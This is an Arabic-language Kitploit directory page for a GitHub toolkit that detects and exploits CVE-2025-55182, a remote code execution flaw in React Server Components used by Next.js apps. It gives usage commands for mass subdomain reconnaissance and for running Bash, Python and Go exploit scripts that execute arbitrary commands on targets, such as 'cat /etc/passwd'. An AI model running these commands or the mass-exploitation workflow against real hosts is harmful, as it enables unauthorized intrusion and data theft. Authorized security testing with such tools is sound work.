Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Simple-Scanner-main — ماسح ضوئي متعدد اللغات لثغرة CVE-2025-55182 (RCE) في مكونات خادم React Next.js، مع أوضاع المسح الفردي/الجماعي وسير عمل استطلاع مكافآت الاختراق المدمج. | Kitploit
أدوات/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتعداد النطاقات الفرعيةالتعلم والتعليم
GitHubjan0x190/cve-2025-55182-simple-scanner-main

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182-Simple-Scanner-main

ماسح ضوئي متعدد اللغات لثغرة CVE-2025-55182 (RCE) في مكونات خادم React Next.js، مع أوضاع المسح الفردي/الجماعي وسير عمل استطلاع مكافآت الاختراق المدمج.

عرض المستودع
14منذ 9 أشهرلم تتم المراجعة بعد

CVE-2025-55182: ماسح ضوئي لثغرة تنفيذ الأوامر عن بُعد في React Server Components

مجموعة أدوات شاملة لاكتشاف واستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد في تطبيقات Next.js التي تستخدم مكونات React Server.

يحتوي هذا المستودع على ماسح Bash موحد (وضع فردي ووضع جماعي)، وتنفيذات بلغة Python/Go، وسير عمل استطلاع لمكافآت الأخطاء.

قائمة الماسح عرض توضيحي للماسح


📂 هيكل المستودع

  • scanner.sh — سكريبت Bash شامل لفحص هدف واحد وفحص جماعي
  • python/exploit.py — تنفيذ Python مستقر (تسكين أفضل لـ JSON)
  • go/main.go — تنفيذ عالي الأداء (قابل للتجميع)

🚀 سير عمل الاستطلاع (منهجية صيد الثغرات)

للبحث الجماعي في النطاقات البدل، استخدم هذا الأنبوب لتصفية الأهداف قبل المسح:

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ استخدام الماسح Bash (موصى به)

يدعم سكريبت scanner.sh فحص هدف واحد وفحص جماعي من قائمة ملفات.

🔧 التثبيت

root@kitploit:~
chmod +x scanner.sh

1️⃣ وضع الهدف الفردي

الأفضل للتحقق من هدف معين مع إخراج مفصل.

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ وضع الفحص الجماعي

يقوم بفحص قائمة عناوين URL بكفاءة وحفظ المضيفين المعرضين للخطر في ملف.

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

الخيارات


🐍 إصدار Python

استخدم هذا إذا واجهت مشاكل مع تخطي Bash للأحرف الخاصة.

المتطلبات

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 إصدار Go

أداء عالي، تبعيات ضئيلة.

التشغيل مباشرة

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

بناء ملف ثنائي

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ إخلاء مسؤولية

هذه الأداة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. الاستخدام غير المصرح به غير قانوني تمامًا. لا يتحمل المطور أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذا البرنامج.


🔗 المراجع

  • تفاصيل CVE من NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • نشرة أمان React (ثغرة مكونات React Server): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • قالب ProjectDiscovery Nuclei: https://cloud.projectdiscovery.io/library/CVE-2025-55182

تنزيل الأداة
FlagDescription
-d, --domainعنوان URL هدف واحد
-l, --listملف يحتوي على قائمة عناوين URL
-c, --commandالأمر المراد تنفيذه (الافتراضي: id)
-o, --outputملف الإخراج للمضيفين المعرضين للخطر (الافتراضي: vulnerable_hosts.txt)